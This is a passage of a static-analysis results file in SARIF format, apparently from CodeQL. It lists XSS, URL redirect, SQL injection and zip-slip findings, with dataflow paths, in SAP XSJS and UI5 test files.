... eter1\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":11,"startColumn":7,"endColumn":26}},"message":{"text":"someParameterValue1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":13,"startColumn":46,"endColumn":65}},"message":{"text":"someParameterValue1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":3,"startColumn":34,"endColumn":51}},"message":{"text":"requestParameters"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":4,"startColumn":20,"endColumn":37}},"message":{"text":"requestParameters"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":4,"startColumn":10,"endColumn":48}},"message":{"text":"\"<div>\" ... </div>\""}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":13,"startColumn":22,"endColumn":66}},"message":{"text":"request ... Value1)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":11,"startColumn":29,"endColumn":68}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":11,"startColumn":29,"endColumn":68}}}]},{"ruleId":"js/xsjs-url-redirect","rule":{"id":"js/xsjs-url-redirect","index":2,"toolComponent":{"index":9}},"message":{"text":"[This URL](1) depends on a [user-provided value](2)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":609},"region":{"startLine":9,"startColumn":38,"endColumn":56}}}],"partialFingerprints":{"primaryLocationLineHash":"f02e3e17e12824b3:1","primaryLocationStartColumnFingerprint":"35"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":609},"region":{"startLine":7,"startColumn":28,"endColumn":66}},"message":{"text":"request ... meter\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":609},"region":{"startLine":7,"startColumn":7,"endColumn":25}},"message":{"text":"someParameterValue"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":609},"region":{"startLine":9,"startColumn":38,"endColumn":56}},"message":{"text":"someParameterValue"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":609},"region":{"startLine":9,"startColumn":38,"endColumn":56}},"message":{"text":"This URL"}},{"id":2,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":609},"region":{"startLine":7,"startColumn":28,"endColumn":66}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":609},"region":{"startLine":7,"startColumn":28,"endColumn":66}}}]},{"ruleId":"js/xsjs-sql-injection","rule":{"id":"js/xsjs-sql-injection","index":3,"toolComponent":{"index":9}},"message":{"text":"This query depends on a [user-provided value](1).\nThis query depends on a [user-provided value](2)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":13,"startColumn":57,"endColumn":62}}}],"partialFingerprints":{"primaryLocationLineHash":"65aa43aa4e46559c:1","primaryLocationStartColumnFingerprint":"54"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":8,"startColumn":40,"endColumn":79}},"message":{"text":"request ... eter1\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":8,"startColumn":29,"endColumn":80}},"message":{"text":"JSON.pa ... ter1\"))"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":8,"startColumn":7,"endColumn":26}},"message":{"text":"someParameterValue1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":10,"startColumn":32,"endColumn":51}},"message":{"text":"someParameterValue1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":10,"startColumn":7,"endColumn":12}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":13,"startColumn":57,"endColumn":62}},"message":{"text":"query"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":9,"startColumn":40,"endColumn":79}},"message":{"text":"request ... eter2\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":9,"startColumn":29,"endColumn":80}},"message":{"text":"JSON.pa ... ter2\"))"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":9,"startColumn":7,"endColumn":26}},"message":{"text":"someParameterValue2"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":10,"startColumn":82,"endColumn":101}},"message":{"text":"someParameterValue2"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":10,"startColumn":7,"endColumn":12}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":13,"startColumn":57,"endColumn":62}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":8,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":2,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":9,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":8,"startColumn":40,"endColumn":79}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":9,"startColumn":40,"endColumn":79}}}]},{"ruleId":"js/xsjs-zip-slip","rule":{"id":"js/xsjs-zip-slip","index":4,"toolComponent":{"index":9}},"message":{"text":"The path of [this zip file](1) being saved depends on a [user-provided value](2).\nThe path of [this zip file](1) being saved depends on a [user-provided value](3).\nThe path of [this zip file](1) being saved depends on a [user-provided value](4).\nThe path of [this zip file](1) being saved depends on a [user-provided value](5).\nThe path of [this zip file](1) being saved depends on a [user-provided value](6).\nThe path of [this zip file](1) being saved depends on a [user-provided value](7).\nThe path of [this zip file](1) being saved depends on a [user-provided value](8).\nThe path of [this zip file](1) being saved depends on a [user-provided value](9).\nThe path of [this zip file](1) being saved depends on a [user-provided value](10).\nThe path of [this zip file](1) being saved depends on a [user-provided value](11).\nThe path of [this zip file](1) being saved depends on a [user-provided value](12).\nThe path of [this zip file](1) being saved depends on a [user-provided value](13).\nThe path of [this zip file](1) being saved depends on a [user-provided value](14).\nThe path of [this zip file](1) being saved depends on a [user-provided value](15).\nThe path of [this zip file](1) being saved depends on a [user-provided value](16).\nThe path of [this zip file](1) being saved depends on a [user-provided value](17).\nThe path of [this zip file](1) being saved depends on a [user-provided value](18).\nThe path of [this zip file](1) being saved depends on a [user-provided value](19).\nThe path of [this zip file](1) being saved depends on a [user-provided value](20).\nThe path of [this zip file](1) being saved depends on a [user-provided value](21).\nThe path of [this zip file](1) being saved depends on a [user-provided value](22).\nThe path of [this zip file](1) being saved depends on a [user-provided value](23).\nThe path of [this zip file](1) being saved depends on a [user-provided value](24).\nThe path of [this zip file](1) being saved depends on a [user-provided value](25).\nThe path of [this zip file](1) being saved depends on a [user-provided value](26).\nThe path of [this zip file](1) being saved depends on a [user-provided value](27).\nThe path of [this zip file](1) being saved depends on a [user-provided value](28).\nThe path of [this zip file](1) being saved depends on a [user-provided value](29).\nThe path of [this zip file](1) being saved depends on a [user-provided value](30).\nThe path of [this zip file](1) being saved depends on a [user-provided value](31).\nThe path of [this zip file](1) being saved depends on a [user-provided value](32).\nThe path of [this zip file](1) being saved depends on a [user-provided value](33).\nThe path of [this zip file](1) being saved depends on a [user-provided value](34).\nThe path of [this zip file](1) being saved depends on a [user-provided value](35).\nThe path of [this zip file](1) being saved depends on a [user-provided value](36).\nThe path of [this zip file](1) being saved depends on a [user-provided value](37).\nThe path of [this zip file](1) being saved depends on a [user-provided value](38).\nThe path of [this zip file](1) being saved depends on a [user-provided value](39).\nThe path of [this zip file](1) being saved depends on a [user-provided value](40).\nThe path of [this zip file](1) being saved depends on a [user-provided value](41).\nThe path of [this zip file](1) being saved depends on a [user-provided value](42).\nThe path of [this zip file](1) being saved depends on a [user-provided value](43)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":12,"startColumn":37,"endColumn":51}}}],"partialFingerprints":{"primaryLocationLineHash":"54d432c04bb48c9c:1","primaryLocationStartColumnFingerprint":"32"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":17,"endColumn":51}},"message":{"text":"jQuery. ... param\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":7,"startColumn":20,"endColumn":63}},"message":{"text":"new $.u ... ffer())"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":7,"startColumn":7,"endColumn":17}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":10,"startColumn":25,"endColumn":35}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":11,"startColumn":65,"endColumn":74}},"message":{"text":"entryPath"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":11,"startColumn":26,"endColumn":75}},"message":{"text":"require ... ryPath)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":11,"startColumn":9,"endColumn":23}},"message":{"text":"targetFilePath"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":12,"startColumn":37,"endColumn":51}},"message":{"text":"targetFilePath"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":23,"endColumn":30}},"message":{"text":"req.url"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":7,"startColumn":20,"endColumn":63}},"message":{"text":"new $.u ... ffer())"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":7,"startColumn":7,"endColumn":17}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":10,"startColumn":25,"endColumn":35}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":11,"startColumn":65,"endColumn":74}},"message":{"text":"entryPath"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":11,"startColumn":26,"endColumn":75}},"message":{"text":"require ... ryPath)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":11,"startColumn":9,"endColumn":23}},"message":{"text":"targetFilePath"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":12,"startColumn":37,"endColumn":51}},"message":{"text":"targetFilePath"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":23,"endColumn":30}},"message":{"text":"req.url"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":7,"startColumn":20,"endColumn":63}},"message":{"text":"new $.u ... ffer())"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":7,"startColumn":7,"endColumn":17}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":10,"startColumn":25,"endColumn":35}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":11,"startColumn":65,"endColumn":74}},"message":{"text":"entryPath"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":11,"startColumn":26,"endColumn":75}},"message":{"text":"require ... ryPath)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":11,"startColumn":9,"endColumn":23}},"message":{"text":"targetFilePath"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":12,"startColumn":37,"endColumn":51}},"message":{"text":"targetFilePath"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":782,"startColumn":18,"endColumn":38}},"message":{"text":"req2.params.category"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":7,"startColumn":20,"endColumn":63}},"message":{"text":"new $.u ... ffer())"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":7,"startColumn":7,"endColumn":17}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":10,"startColumn":25,"endColumn":35}},"message":{"text":"zipArchive"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":11,"startColumn":65,"endColumn":74}},"message":{"text":"entryPath"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":11,"startColumn":26,"endColumn":75}},"message":{"text":"require ... ryPath)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":11,"startColumn":9,"endColumn":23}},"message":{"text":"targetFilePath"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":12,"startColumn":37,"endColumn":51}},"message":{"text":"targetFilePath"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":610},"region":{"startLine":12,"startColumn":37,"endColumn":51}},"message":{"text":"this zip file"}},{"id":2,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":6,"startColumn":17,"endColumn":51}},"message":{"text":"user-provided value"}},{"id":3,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":13,"startColumn":23,"endColumn":30}},"message":{"text":"user-provided value"}},{"id":4,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2},"region":{"startLine":21,"startColumn":23,"endColumn":30}},"message":{"text":"user-provided value"}},{"id":5,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":782,"startColumn":18,"endColumn":38}},"message":{"text":"user-provided value"}},{"id":6,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}},"message":{"text":"user-provided value"}},{"id":7,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"id":8,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":34}},"message":{"text":"user-provided value"}},{"id":9,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"id":10,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":34}},"message":{"text":"user-provided value"}},{"id":11,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":25,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"id":12,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":25,"startColumn":17,"endColumn":34}},"message":{"text":"user-provided value"}},{"id":13,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js","uriBaseId":"%SRCROOT%","index":415},"region":{"startLine":6,"startColumn":18,"endColumn":26}},"message":{"text":"user-provided value"}},{"id":14,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js","uriBaseId":"%SRCROOT%","index":415},"region":{"startLine":6,"startColumn":49,"endColumn":57}},"message":{"text":"user-provided value"}},{"id":15,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":11,"startColumn":29,"endColumn":68}},"message":{"text":"user-provided value"}},{"id":16,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":11,"startColumn":29,"endColumn":50}},"message":{"text":"user-provided value"}},{"id":17,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":21,"startColumn":29,"endColumn":68}},"message":{"text":"user-provided value"}},{"id":18,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":21,"startColumn":29,"endColumn":50}},"message":{"text":"user-provided value"}},{"id":19,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":31,"startColumn":29,"endColumn":68}},"message":{"text":"user-provided value"}},{"id":20,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":607},"region":{"startLine":31,"startColumn":29,"endColumn":50}},"message":{"text":"user-provided value"}},{"id":21,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":8,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":22,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":8,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":23,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":9,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided value"}},{"id":24,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":9,"startColumn":40,"endColumn":61}},"message":{"text":"user-provided value"}},{"id":25,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":608},"region":{"startLine":23,"startColumn":40,"endColumn":79}},"message":{"text":"user-provided 